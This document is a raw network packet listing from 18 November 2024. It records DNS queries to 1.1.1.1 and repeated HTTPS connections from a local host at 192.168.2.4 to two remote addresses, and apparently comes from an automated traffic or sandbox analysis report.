                                          Nov 18, 2024 23:44:07.777195930 CET5729953192.168.2.41.1.1.1
                                          Nov 18, 2024 23:44:07.782171011 CET53572991.1.1.1192.168.2.4
                                          Nov 18, 2024 23:44:07.782275915 CET5729953192.168.2.41.1.1.1
                                          Nov 18, 2024 23:44:07.787226915 CET53572991.1.1.1192.168.2.4
                                          Nov 18, 2024 23:44:08.393066883 CET5729953192.168.2.41.1.1.1
                                          Nov 18, 2024 23:44:08.399389029 CET53572991.1.1.1192.168.2.4
                                          Nov 18, 2024 23:44:08.399730921 CET5729953192.168.2.41.1.1.1
                                          Nov 18, 2024 23:44:44.360441923 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:44.360502005 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:44.360575914 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:44.360826015 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:44.360848904 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:44.559500933 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:44.559556007 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:44.559621096 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:44.559916019 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:44.559935093 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:45.113662958 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.113761902 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.116808891 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.116825104 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.117227077 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.127540112 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.171327114 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.342602015 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.342662096 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.342705965 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.342740059 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.342772007 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.342788935 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.342818022 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.383409023 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.383477926 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.383508921 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.383518934 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.383564949 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.459614038 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.459686995 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.459727049 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.459745884 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.459784031 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.459808111 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.500227928 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.500291109 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.500325918 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.500350952 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.500380993 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.500405073 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.502116919 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.502167940 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.502203941 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.502232075 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.502264023 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.502280951 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.578975916 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.579049110 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.579075098 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.579090118 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.579128027 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.579147100 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.579159975 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.579190016 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.579235077 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.579246044 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.579253912 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.579272032 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.579308987 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.579351902 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.616431952 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.616488934 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.616518974 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.616533995 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.616580963 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.616606951 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.617260933 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.617311954 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.617342949 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.617357016 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.617393017 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.617413998 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.618846893 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.618890047 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.618927002 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.618940115 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.618968964 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.618989944 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.619781017 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.619822025 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.619863033 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.619875908 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.619906902 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.619925022 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.659466982 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.659528971 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.659562111 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.659574986 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.659611940 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.659634113 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.687460899 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:45.687545061 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:45.689913034 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:45.689968109 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:45.690404892 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:45.694035053 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.694098949 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.694125891 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.694145918 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.694183111 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.694204092 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.694240093 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.694314957 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.694329023 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.694382906 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.694406986 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.694463015 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.694804907 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.694850922 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.694880962 CET57301443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.694896936 CET4435730113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.705347061 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:45.747361898 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:45.768049002 CET57303443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.768120050 CET4435730313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.768196106 CET57303443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.770311117 CET57304443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.770344019 CET4435730413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.770401001 CET57304443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.772061110 CET57305443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.772157907 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.772233009 CET57305443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.772699118 CET57303443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.772731066 CET4435730313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.772816896 CET57304443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.772831917 CET4435730413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.774614096 CET57306443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.774629116 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.774692059 CET57306443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.774818897 CET57306443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.774830103 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.774928093 CET57305443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.774974108 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.776457071 CET57307443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.776479959 CET4435730713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:45.776551962 CET57307443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.776690006 CET57307443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:45.776702881 CET4435730713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.079848051 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:46.079906940 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:46.079950094 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:46.080070972 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:46.080133915 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:46.080209017 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:46.080892086 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:46.080950975 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:46.080986023 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:46.080997944 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:46.081022978 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:46.085663080 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:46.085705042 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:46.085728884 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:46.086082935 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:46.086170912 CET443573024.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:46.086231947 CET57302443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:46.503643990 CET4435730413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.504271030 CET57304443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.504292011 CET4435730413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.504821062 CET57304443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.504826069 CET4435730413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.509290934 CET4435730713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.509716034 CET4435730313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.510947943 CET57307443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.510982990 CET4435730713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.511529922 CET57307443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.511535883 CET4435730713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.512196064 CET57303443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.512234926 CET4435730313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.512785912 CET57303443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.512799025 CET4435730313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.518040895 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.519855976 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.520870924 CET57306443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.520886898 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.521346092 CET57305443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.521365881 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.521841049 CET57306443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.521846056 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.521955013 CET57305443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.521960974 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.657677889 CET4435730413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.657704115 CET4435730413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.657768011 CET4435730413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.657854080 CET57304443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.657958984 CET57304443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.658085108 CET57304443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.658085108 CET57304443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.658108950 CET4435730413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.658139944 CET4435730413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.658296108 CET4435730313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.658469915 CET4435730313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.658552885 CET57303443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.658761978 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.658844948 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.658845901 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.658890963 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.658920050 CET57305443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.658952951 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.658978939 CET57306443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.658981085 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.658989906 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.659012079 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.659041882 CET57305443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.659118891 CET57306443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.659337044 CET57306443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.659337044 CET57306443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.659343958 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.659353971 CET4435730613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.660073996 CET57303443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.660120964 CET4435730313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.660150051 CET57303443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.660166025 CET4435730313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.661523104 CET57305443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.661542892 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.661556005 CET57305443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.661562920 CET4435730513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.664046049 CET57308443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.664134026 CET4435730813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.664223909 CET57308443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.665426970 CET57309443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.665518045 CET4435730913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.665602922 CET57309443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.665967941 CET57308443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.665999889 CET4435730813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.666129112 CET57309443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.666167021 CET4435730913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.667504072 CET57310443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.667530060 CET4435731013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.667623997 CET57310443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.667781115 CET57310443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.667804003 CET4435731013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.668924093 CET57311443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.668946028 CET4435731113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.669173002 CET57311443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.669362068 CET57311443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.669387102 CET4435731113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.673322916 CET4435730713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.673393011 CET4435730713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.673459053 CET57307443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.673691034 CET57307443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.673697948 CET4435730713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.673711061 CET57307443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.673715115 CET4435730713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.676147938 CET57312443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.676235914 CET4435731213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:46.677069902 CET57312443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.677232981 CET57312443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:46.677268028 CET4435731213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.399245024 CET4435730813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.400032043 CET57308443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.400053978 CET4435730813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.400927067 CET57308443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.400933027 CET4435730813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.406269073 CET4435731013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.406739950 CET57310443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.406747103 CET4435731013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.407326937 CET57310443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.407330990 CET4435731013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.409750938 CET4435731113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.410422087 CET57311443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.410471916 CET4435731113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.410953045 CET57311443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.410965919 CET4435731113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.422211885 CET4435730913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.422610044 CET57309443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.422638893 CET4435730913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.423192024 CET57309443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.423202038 CET4435730913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.431272984 CET4435731213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.431777954 CET57312443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.431839943 CET4435731213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.432204008 CET57312443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.432219028 CET4435731213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.534457922 CET4435730813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.534854889 CET4435730813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.534930944 CET57308443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.534991980 CET57308443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.535011053 CET4435730813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.535044909 CET57308443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.535053968 CET4435730813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.538043022 CET57313443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.538144112 CET4435731313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.538266897 CET57313443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.538414955 CET57313443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.538431883 CET4435731313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.539973974 CET4435731013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.540175915 CET4435731013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.540230036 CET57310443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.540281057 CET57310443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.540287971 CET4435731013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.540302992 CET57310443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.540307999 CET4435731013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.542642117 CET4435731113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.542774916 CET4435731113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.542846918 CET57311443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.542918921 CET57311443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.542954922 CET4435731113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.543001890 CET57311443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.543018103 CET4435731113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.544950962 CET57314443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.545042992 CET4435731413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.545149088 CET57314443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.551146030 CET57314443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.551158905 CET4435731413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.553354979 CET57315443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.553384066 CET4435731513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.553468943 CET57315443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.554378986 CET57315443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.554410934 CET4435731513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.556245089 CET4435730913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.556406021 CET4435730913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.556483984 CET57309443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.556535959 CET57309443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.556562901 CET4435730913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.556586981 CET57309443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.556598902 CET4435730913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.559053898 CET57316443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.559094906 CET4435731613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.559179068 CET57316443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.559397936 CET57316443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.559416056 CET4435731613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.804888010 CET4435731213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.805039883 CET4435731213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.805120945 CET57312443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.805217028 CET57312443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.805257082 CET4435731213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.805289984 CET57312443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.805305958 CET4435731213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.808057070 CET57317443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.808090925 CET4435731713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:47.808175087 CET57317443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.808346033 CET57317443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:47.808362961 CET4435731713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.275579929 CET4435731313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.276352882 CET57313443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.276415110 CET4435731313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.277595997 CET57313443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.277610064 CET4435731313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.295020103 CET4435731413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.295445919 CET57314443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.295505047 CET4435731413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.296021938 CET57314443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:48.296036005 CET4435731413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.305037022 CET4435731613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:48.305561066 CET57316443192.168.2.413.107.246.45
